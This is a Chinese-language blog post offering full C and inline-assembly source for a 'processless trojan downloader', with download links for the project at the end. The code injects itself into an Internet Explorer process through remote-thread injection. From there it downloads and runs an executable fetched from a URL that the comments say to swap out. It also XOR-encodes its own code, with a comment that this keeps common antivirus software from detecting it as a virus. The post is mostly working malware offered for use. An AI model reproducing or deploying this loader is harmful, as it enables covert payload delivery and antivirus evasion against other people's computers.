VC无进程木马下载器源码(利用IE隐藏进程)

 

 

一、 打开半年前的一个工程，是利用IE来隐藏进程下载的实例，我想灰鸽子也是类似原理吧！

 

      下面是程序的主要思路：

 

      1.获取程序自身路径，启动IE进程

 

      2.获取到IE进程句柄

 

      3.分配内存

 

      4.获取进程映像的地址

 

      5.得到内存镜像大小

 

      6.确定起始基址和内存映像基址的位置

 

      7.写内存，创建线程，写数据

 

      8.建立远程线程并运行,关闭对象

 

 

二、下面是源码 ，举例下载迅雷而矣：

/* VC无进程木马下载器By: Kardinal and 寂寞的狼2009.3.10*/#include <windows.h>#pragma comment(lib,"user32.lib")#pragma comment(lib,"kernel32.lib")//取消这4行的注释，可编译出2K大的文件//#pragma comment(linker,"/OPT:NOWIN98")//#pragma comment(linker,"/merge:.data=.text")//#pragma comment(linker,"/merge:.rdata=.text")//#pragma comment(linker,"/align:0x200")#pragma comment(linker,"/ENTRY:decrpt")#pragma comment(linker,"/subsystem:windows")#pragma comment(linker,"/BASE:0x13150000")//动态加载shell32.dll中的ShellExecuteA函数HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);//动态加载Urlmon.dll中的UrlDownloadToFileA函数DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);//建立远程线程，并运行HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); void decrpt();HANDLE processhandle;DWORD pid;HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用// 注入使用的下载函数void download(){hshell= LoadLibrary("Shell32.dll");hurlmon= LoadLibrary("urlmon.dll");(FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");(FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");//下载的文件自行调整DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);ExitProcess(0);}void main(){char iename[MAX_PATH],iepath[MAX_PATH];ZeroMemory(iename,sizeof(iename));ZeroMemory(iepath,sizeof(iepath));// 1.获取程序自身路径，启动IE进程GetWindowsDirectory(iepath,MAX_PATH);strncpy(iename,iepath,3);strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");WinExec(iename,SW_SHOWNORMAL);Sleep(500);// 2.得到IE进程句柄HWNDhtemp;htemp = FindWindow("IEFrame",NULL);GetWindowThreadProcessId(htemp,&pid);// 3.分配内存HMODULE Module;LPVOIDNewModule;DWORDSize;LPDWORD lpimagesize;// 4.进程映像的地址Module = GetModuleHandle(NULL);// 5.得到内存镜像大小_asm { push eax; push ebx; mov ebx,Module; mov eax,[ebx+0x3c]; lea eax,[ebx+eax+0x50]; mov eax,[eax] mov lpimagesize,eax; pop ebx; pop eax; }; Size=(DWORD)lpimagesize; // 确定起始基址和内存映像基址的位置NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 6.写内存，创建线程，写数据WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);LPTHREAD_START_ROUTINE entrypoint; __asm { push eax; lea eax,download; mov entrypoint,eax; pop eax } hkernel=LoadLibrary("KERNEL32.dll"); (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread"); MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行 // 7.关闭对象 CloseHandle(processhandle); return; } ; // 解密函数 void decrpt() { HANDLE myps; DWORD oldAttr; BYTE shellcode[500]; ZeroMemory(shellcode,sizeof(shellcode)); myps=GetCurrentProcess(); ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr); //先把原代码,搬移到变量中保存起来 _asm { pushad; lea esi,download;lea edi,shellcode; lea ecx,decrpt; sub ecx,esi; en1: lodsb; stosb; dec ecx; jne en1; popad; }; //解密搬回 int i; for (i=1;i<=0xFF;i++) { _asm { pushad; lea esi,shellcode; lea edi,download; lea ecx,decrpt; sub ecx,edi; en2: lodsb; mov ebx,i; xor al,bl; stosb; dec ecx; jne en2; popad; }; //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒. __try { main(); return; } __except(EXCEPTION_EXECUTE_HANDLER) { }; } return; }

 

三、工程及源码下载地址：

 

      http://download.csdn.net/source/1546155

 

      http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/